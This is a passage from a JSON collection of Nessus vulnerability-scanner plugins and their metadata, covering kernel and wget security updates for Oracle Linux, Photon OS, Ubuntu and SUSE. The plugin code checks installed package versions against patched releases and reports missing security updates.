reference:\"kernel-uek-firmware-4.1.12-112.14.13.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T04:44:20", "description": "Description of changes:\n\n[4.1.12-112.14.13.el7uek]\n- Revert 'kernel.spec: Require the new microcode_ctl.' 
(Brian Maly)\n\n[4.1.12-112.14.12.el7uek]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: \n27386890]\n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: pull nseg validation out in a function (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) \n[Orabug: 27386890]\n- x86: Clean up IBRS functionality resident in common code (Kanth \nGhatraju) [Orabug: 27403317]\n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) \n[Orabug: 27403317]\n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: \n27403317]\n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas \nGleixner) [Orabug: 27403317]\n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) \n[Orabug: 27403317]\n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: \n27403317]\n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: \n27403317]\n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) \n{CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) \n[Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: \n27397568]\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) \n[Orabug: 27397001]", "edition": 28, "cvss3": {"score": 7.4, "vector": "AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-01-22T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4017) (Spectre)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5753", "CVE-2017-1000407"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", 
"p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4017.NASL", "href": "https://www.tenable.com/plugins/nessus/106225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4017.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106225);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-5753\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4017) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-112.14.13.el7uek]\n- Revert 'kernel.spec: Require the new microcode_ctl.' 
(Brian Maly)\n\n[4.1.12-112.14.12.el7uek]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: \n27386890]\n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: pull nseg validation out in a function (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) \n[Orabug: 27386890]\n- x86: Clean up IBRS functionality resident in common code (Kanth \nGhatraju) [Orabug: 27403317]\n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) \n[Orabug: 27403317]\n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: \n27403317]\n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas \nGleixner) [Orabug: 27403317]\n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) \n[Orabug: 27403317]\n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: \n27403317]\n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: \n27403317]\n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) \n{CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) \n[Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: \n27397568]\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) \n[Orabug: 27397001]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-January/007463.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-January/007464.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, 
Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000407\", \"CVE-2017-5753\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4017\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && 
rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:39:25", "description": "An update of the wget package has been released.", "edition": 8, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 2.0: Wget 
PHSA-2017-2.0-0008", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6508", "CVE-2017-1000405"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:wget", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2017-2_0-0008_WGET.NASL", "href": "https://www.tenable.com/plugins/nessus/121793", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121793);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2017-6508\");\n\n script_name(english:\"Photon OS 2.0: Wget PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the wget package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"wget-1.19.1-4.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"wget-debuginfo-1.19.1-4.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", 
"cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:02", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105106", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3510-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105106);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3510-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3510-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3510-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic-lpae\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-lowlatency\", pkgver:\"3.13.0-137.186\")) flag++;\nif 
(ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.137.146\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:27:12", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-3225-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3225-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105072);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n 